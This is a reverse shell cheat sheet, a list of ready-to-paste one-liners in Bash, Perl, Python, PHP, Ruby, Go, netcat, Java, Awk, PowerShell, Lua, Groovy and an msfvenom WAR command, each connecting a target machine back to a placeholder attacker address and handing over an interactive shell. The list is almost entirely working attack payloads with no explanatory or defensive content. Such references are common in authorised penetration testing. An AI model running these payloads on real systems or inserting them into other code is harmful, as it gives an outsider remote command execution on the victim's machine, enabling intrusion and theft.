Reverse Shell Cheat Sheet

Bash(TCP)

bash -i >& /dev/tcp/youripaddress/port 0>&1 

Bash (UDP)

sh -i >& /dev/udp/youripaddress/port 0>&1 

Perl

perl -e 'use Socket;$i="youripaddress";$p=port;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Python


python -c 'import
socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("youripaddress",port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

PHP


php -r '$sock=fsockopen("youripaddress",port);exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("youripaddress",port);shell_exec("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("youripaddress",port);`/bin/sh -i <&3 >&3 2>&3`;'
php -r '$sock=fsockopen("youripaddress",port);system("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("youripaddress",port);passthru("/bin/sh -i <&3 >&3 2>&3");'
php -r '$sock=fsockopen("youripaddress",port);popen("/bin/sh -i <&3 >&3 2>&3", "r");'

php -r '$sock=fsockopen("youripaddress",port);$proc=proc_open("/bin/sh -i", array(0=>$sock, 1=>$sock, 2=>$sock),$pipes);'

Ruby


ruby -rsocket -e'f=TCPSocket.open("youripaddress",port).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

ruby -rsocket -e 'exit if fork;c=TCPSocket.new("youripaddress","port");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'

Go Lang


echo 'package main;import"os/exec";import"net";func main(){c,_:=net.Dial("tcp","youripaddress:port");cmd:=exec.Command("/bin/sh");cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}' > /tmp/t.go && go run /tmp/t.go && rm /tmp/t.go

NetCat


nc -e /bin/sh youripaddress port
nc -e /bin/bash youripaddress port
nc -c bash youripaddress port

Java


r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/youripaddress/port;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Awk


awk 'BEGIN {s = "/inet/tcp/0/youripaddress/port"; while(42) { do{ printf "shell>" |& s; s |& getline c; if(c){ while ((c |& getline) > 0) print $0 |& s; close(c); } } while(c != "exit") close(s); }}' /dev/null

PowerShell


powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient("youripaddress",port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()

powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('youripaddress',port);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

War


msfvenom -p java/jsp_shell_reverse_tcp LHOST=youripaddress LPORT=port -f war > reverse.war

Lua


lua -e "require('socket');require('os');t=socket.tcp();t:connect('youripaddress','port');os.execute('/bin/sh -i <&3 >&3 2>&3');"

Groovy


String host="youripaddress";
int port=port;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

C


you can get reverse shell C program from link below
C Reverse Shell Program

References

PayloadAllTheThings
Pentest Monkey
Highon Coffee